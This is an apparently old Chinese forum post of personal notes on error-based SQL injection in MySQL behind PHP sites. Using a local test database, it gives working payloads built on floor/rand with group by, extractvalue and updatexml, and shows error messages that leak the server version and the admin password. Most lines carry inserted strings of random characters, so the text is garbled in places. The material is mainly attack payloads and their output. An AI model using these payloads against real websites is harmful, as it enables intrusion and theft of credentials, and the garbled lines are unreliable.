放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。$ R, W; Y: G: q" o; C: ]
实际测试环境:
: Z; z* L7 E3 j
- [* ~8 {, ~% @5 Q2 k
, u/ }7 ? ^) ?+ ~1 {. \5 ]mysql> show tables;
. t8 X+ i P' r/ {7 H+----------------+& L* K8 t5 U; Q; v- d- P3 Y! y& q
| Tables_in_test |1 {6 U0 _! @) ^$ m( n
+----------------+5 s+ l$ R. k( R0 \ z1 q
| admin |
" D" R0 c2 p, G4 o, |2 S) b| article |% d8 F7 b1 o% s& ` `
+----------------+; Q# [4 l& ]6 z) M
/ X( A* ~5 b% \* w; G
, H" q; v0 N# e% f ; { q) p% {1 p& [$ Q
mysql> describe admin;% a7 [ I# r9 I& x' T2 a r
+-------+------------------+------+-----+---------+----------------+
0 Y) {0 i8 \$ e8 E: i| Field | Type | Null | Key | Default | Extra |- M' d0 Z+ R, N" z* d! q& o
+-------+------------------+------+-----+---------+----------------+
$ j- a. D1 o9 S; ~. z" M| id | int(10) unsigned | NO | PRI | NULL | auto_increment |3 j, K& n* E/ i9 f
| user | varchar(50) | NO | | NULL | |2 c- I9 q4 ]9 ~! _. Q
| pass | varchar(50) | NO | | NULL | |
9 ~7 e2 O. Y+ l1 j3 I( N0 G! x+-------+------------------+------+-----+---------+----------------+
2 l' g1 D( c" l4 l) }( f
6 s, R& M J+ I8 z* C 5 h0 j: x" F. v0 ]0 b8 \
0 [# e0 B) G! h( qmysql> describe article;) Q" c1 R2 H3 p2 t4 h. N
+---------+------------------+------+-----+---------+----------------+5 |2 V# \! N4 i. n: @) M
| Field | Type | Null | Key | Default | Extra |
. S& ~+ V' T0 V! Q% U* z3 j+---------+------------------+------+-----+---------+----------------+
4 ]6 v0 V1 Q+ v/ [( ?1 s+ O7 ~, n| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
1 x. W5 y7 ^, j/ `| title | varchar(50) | NO | | NULL | |
, M: e% a" x+ Y& P; q- ]5 {| content | varchar(50) | NO | | NULL | |
( f& k7 R) Z: ^- ?+---------+------------------+------+-----+---------+----------------+
1 k% \! K: a7 P4 E: s1 Q" F$ j0 R1、通过floor报错
, }( r8 J9 g( @6 H可以通过如下一些利用代码( V& g0 u: j4 P+ F! A/ w+ T6 c
0 S/ \" _4 u& u. `0 h) M! P
# J& A& C2 M5 Eand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
8 \* e! w6 x/ P( |& e+ Wfrom information_schema.tables group by x)a);( n1 \5 j0 ^% q7 i( g
: F+ S) r$ w0 i& R# ]
% _, U8 Z0 |7 B) _; o8 R$ {9 [
and (select count(*) from (select 1 union select null union select !1)x
/ d) B: B# C3 B4 W9 W0 u8 egroup by concat((select table_name from information_schema.tables limit 1),
' q4 Z9 A* }+ H& {0 c$ ~6 }floor(rand(0)*2)));( \& G+ B0 t* [% x7 r0 u
举例如下:
[$ H6 ^* C% N/ j+ @( Z) s首先进行正常查询:# V+ ^, `+ R0 u# P% C( q+ j! N
3 M0 i" A% C2 p. Q) t
mysql> select * from article where id = 1;
) B8 b: Z* r! P I2 e8 ~+----+-------+---------+$ I' q% H2 i; ]( |# L7 u2 L. r
| id | title | content |
3 A8 `5 g( p7 { q, l+----+-------+---------+
1 S. h0 ?1 D j| 1 | test | do it |0 t! d2 m" ` b& J5 G
+----+-------+---------+
! x2 ?& ^( e* W! X* s假如id输入存在注入的话,可以通过如下语句进行报错。
! I9 d( S& a/ o9 e& [; ^0 l1 v
. b% ?! P/ c3 k
" w; R) [# t3 \! Nmysql> select * from article where id = 1 and (select 1 from
/ L( `, Q/ C0 ?% }(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
/ N y4 ~! E' p. @, [2 q# OERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
( I+ [" s( t2 a; S( K g0 b可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
5 A O+ l# M" p# B5 f0 g例如我们需要查询管理员用户名和密码:
5 X' }8 u5 e6 i* X% S mMethod1:: Y9 Z( X2 U) B1 g6 f
. N! p" b8 G" W
: |6 Y7 { A7 w {mysql> select * from article where id = 1 and (select 1 from/ S* J! L" T1 }0 j+ X+ _
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x5 B, Y$ f8 ]- ]9 N! e' b9 u+ i/ x
from information_schema.tables group by x)a);
! p( N. I0 s8 f1 h7 D2 X6 r- L! g jERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'+ j4 o9 j7 x X* F/ g9 I1 B, ^
Method2:9 k$ k! l- h* H. J: ?6 a! K1 }% e. ~$ L
$ [2 N7 n$ \8 }' P1 b2 Y7 |. R
8 J `0 g: Y. q" _. ]! }mysql> select * from article where id = 1 and (select count(*); Z# T) v+ p' N1 ^+ u
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),5 `9 n" h9 D) N, u y
floor(rand(0)*2)));
% I& A0 @% @2 }. K, SERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
, G* h8 M0 g7 r# \% B: Q( O; e2、ExtractValue
4 J. O; W, @- J( Y/ u9 \2 W0 F测试语句如下
+ R1 |# E# |6 {8 L/ K ' ]% B( L5 g* E% b; o5 Q9 g
" s3 E, W7 Q) w
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));. _" \2 C+ N* t: l% A* P6 B
实际测试过程8 i6 E% ] X- n& k) y0 U+ ], @
" _: h1 s( B# T$ j2 d
- C. i3 M2 D& V3 L4 g2 T8 umysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,+ T! C" J4 Q d' s% p
(select pass from admin limit 1)));--& d D) l, }4 Y7 L& \
ERROR 1105 (HY000): XPATH syntax error: '\admin888': `- [- N a$ Y
3、UpdateXml1 g7 u: [/ A, S/ r% m$ C; M8 K) `
测试语句
( _4 D3 q; t7 Q) w2 g! u* ?
4 |' X1 [& [- [$ K$ ^8 d6 T: R + M, q/ c8 w0 J& }& J5 g: Z9 i
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))& b. v: F0 @$ b3 e4 m; E% X
实际测试过程
4 H$ |5 _% W4 X3 p " {4 t9 G/ h, A u* v
% j" W6 U) L5 `# Q% }8 ?4 ^
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,. H1 p. ]; o& [- g- P
(select pass from admin limit 1),0x5e24),1));
9 K$ g& }! U o6 s& G! SERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
, X& F8 V2 @- g3 \; U7 QAll, thanks foreign guys.5 }8 h. `9 y, M8 @1 R- U
! B; m* r8 C2 c# V. j% B1 i/ G
2 t! g% S2 w" E) s7 {& ` f
|
发表于 2012-12-10 10:28:51
收藏
支持
反对